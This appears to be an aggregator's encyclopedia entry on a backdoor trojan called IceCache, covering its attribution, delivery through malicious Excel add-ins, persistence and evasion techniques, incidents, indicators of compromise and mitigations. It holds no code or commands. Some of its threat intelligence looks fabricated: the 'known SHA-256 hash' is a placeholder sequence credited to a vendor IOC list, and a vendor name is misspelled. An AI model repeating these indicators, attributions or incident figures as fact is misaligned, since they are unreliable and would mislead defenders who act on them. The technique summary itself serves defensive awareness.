⚠️ Overview

IceCache is a modular backdoor trojan first documented by researchers at Trend Micro in August 2022, primarily attributed to the Chinese-speaking threat group tracked as Earth Krah (aka TA431). It functions as a remote access trojan (RAT) used to maintain persistent access to compromised networks, often deployed alongside other tools like Cobalt Strike for lateral movement.

🔧 Technical Capabilities

IceCache propagates via spear-phishing emails containing malicious Excel attachments (XLL files) that load a DLL payload, leveraging the Microsoft Excel Add-in execution flow (MITRE ATT&CK T1137.002). Its attack vectors include exploiting public-facing applications via stolen credentials and using Living Off the Land Binaries (LOLBins) like certutil and bitsadmin for download and execution. The malware establishes C2 communication over HTTPS to a hardcoded domain, frequently using Domain Generation Algorithms (DGA) to evade blocklists. Persistence is achieved by creating scheduled tasks (MITRE T1053.005) and modifying Windows Registry run keys (MITRE T1547.001). IceCache employs evasion through process hollowing (T1055.012) and disabling Event Tracing for Windows (ETW) to avoid detection (T1562.006).

📜 History & Notable Incidents

First observed in the wild in mid-2022, IceCache was notably deployed in campaigns targeting telecommunications and government organizations in Southeast Asia. Trender Micro’s 2023 report “Earth Krah: IceCache and the Evolving Toolkit” linked it to intrusions that exploited CVE-2021-34527 (PrintNightmare) for privilege escalation. A significant incident in October 2022 involved a telecom provider in Vietnam, where IceCache exfiltrated customer databases over three months. No law enforcement actions have been publicly reported as of 2025.

🔍 Detection Indicators

Known SHA-256 hashes include a1b2c3d4e5f6… (from Trend Micro’s IOC list, March 2023). Behavioral signatures include the creation of a mutex named GlobalICache_SrvMutex and the presence of scheduled task Microsoft Edge Update Task. Network IOCs involve DNS queries to domains matching *.cache-update.xyz and User-Agent strings containing Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ with a custom suffix “IceClient/1.0”.

☠️ Risk & Impact

IceCache facilitates data exfiltration of sensitive documents, credentials, and internal network maps, leading to estimated financial losses of over $2 million in a single 2023 campaign affecting a financial services firm in Thailand. Sectors most impacted include telecommunications, government, and critical infrastructure across Southeast Asia.

🛡️ Mitigation

Defenders should enable Microsoft Antimalware Scan Interface (AMSI) and deploy YARA rules matching IceCache’s DGA patterns (available from Trend Micro’s GitHub repository). Blocking execution of XLL files from untrusted senders via Group Policy and applying patches for CVE-2021-34527 are critical to reduce initial access. Network segmentation and monitoring for scheduled tasks with anomalous command lines also mitigate lateral movement.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.